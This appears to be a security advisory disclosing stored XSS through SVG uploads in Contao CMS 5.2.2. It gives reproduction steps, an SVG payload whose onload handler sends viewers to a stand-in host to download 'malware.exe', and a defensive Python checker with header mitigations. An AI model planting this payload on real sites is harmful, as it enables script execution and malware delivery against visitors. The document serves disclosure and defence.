Contao CMS | Stored XSS via SVG file upload
Information

| Field | Value |
|---|---|
| Software Type | Web App |
| Software Name | Contao CMS |
| Affected Version | 5.2.2 |
| Software Vendor | Contao CMS |
| Software Link | https://github.com/contao/contao |
| Severity | Medium |
| CVSS Score | 5.7 |
| CVE Link | N/A |
| Affected Assets | 84092+ |
| Date of Discovery | March 10th, 2025 |
| PoC Exploit | N/A |
Description
Contao version 5.2.2 allows all backend users with file upload permissions to upload SVG files. No filter blocks JavaScript inside uploaded SVG files, so we can embed malicious JavaScript code and have it run when the file is viewed. Although we don't have access to document.cookie, we can still force a malicious file download onto the user's computer.
Reproduce
To reproduce this issue, log in as a backend user with file upload permissions. Visit /contao?do=files and click the “Expand all” button; this expands all file directories and displays a green + symbol on the directories you can upload files to.
Click to upload a file, and use the following SVG file:
```xml
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" onload="window.location.href='http://127.0.0.1:8000/malware.exe';"><rect width="200" height="200" fill="lightblue" /></svg>
```
Upload it and open it. Its URL may be rewritten to something like this:
https://testhub.local/assets/images/6/xss-jngpk00yy1y1gjp.svg
Visiting the image runs the embedded JavaScript, which downloads a malware.exe file onto the user's computer.
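The missing control is a server-side check on SVG content before the upload is accepted. The following is an added example, not Contao's own code: it parses an uploaded SVG and reports the constructs that make it executable in a browser (event-handler attributes such as the `onload` used above, `<script>` and `<foreignObject>` elements, and `javascript:` hrefs). The function name `svg_findings` and the sample inputs are constructed for this illustration.

```python
"""Reject script-bearing SVG uploads (hypothetical pre-storage check)."""
import xml.etree.ElementTree as ET

XLINK_NS = "http://www.w3.org/1999/xlink"
# Elements that execute script or embed arbitrary HTML inside an SVG.
ACTIVE_TAGS = {"script", "foreignObject"}
# Attributes whose value is a URL and may carry a javascript: scheme.
URL_ATTRS = {"href", f"{{{XLINK_NS}}}href"}


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def svg_findings(data: bytes) -> list[str]:
    """Return the reasons an SVG upload is unsafe; an empty list means it passed.

    Note: the stdlib parser is used so the example has no dependencies; for
    untrusted input in production, parse with defusedxml instead.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # Unparseable input is rejected rather than passed through to the browser.
        return [f"unparseable XML: {exc}"]
    if _local(root.tag) != "svg":
        return [f"root element is <{_local(root.tag)}>, not <svg>"]
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            short = _local(attr)
            if short.lower().startswith("on"):
                # onload, onclick, onbegin ... every on* attribute is an event handler.
                findings.append(f"event handler {short} on <{tag}>")
            elif attr in URL_ATTRS:
                # Browsers ignore whitespace inside the scheme, so strip it before matching.
                scheme = "".join(value.split()).lower()
                if scheme.startswith("javascript:"):
                    findings.append(f"javascript: href on <{tag}>")
    return findings


# Constructed sample: the onload pattern from this advisory with a harmless handler.
SAMPLE_ONLOAD = (b'<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" '
                 b'onload="alert(1)"><rect width="200" height="200" fill="lightblue"/></svg>')
SAMPLE_CLEAN = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'
```

An upload handler would store the file only when `svg_findings` returns an empty list; serving the upload directory with `Content-Disposition: attachment` or a `Content-Security-Policy: sandbox` header is a complementary, browser-side mitigation.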
Proof of Concept (PoC) Video
No PoC video available.
Posted on: May 24, 2025 04:01 AM